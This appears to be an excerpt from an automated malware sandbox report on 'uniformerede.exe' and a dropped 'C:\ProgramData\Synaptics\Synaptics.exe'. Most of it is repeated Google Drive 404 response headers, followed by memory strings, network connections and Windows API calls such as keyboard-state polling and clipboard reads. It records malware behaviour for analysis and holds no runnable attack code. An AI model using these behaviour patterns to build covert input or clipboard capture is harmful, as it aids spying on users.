                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0043C1FC GetKeyboardState,6_2_0043C1FC
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00405809
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,6_2_004289FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,12_2_00429040
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004601F06_2_004601F0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046C7CC6_2_0046C7CC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048C7F46_2_0048C7F4
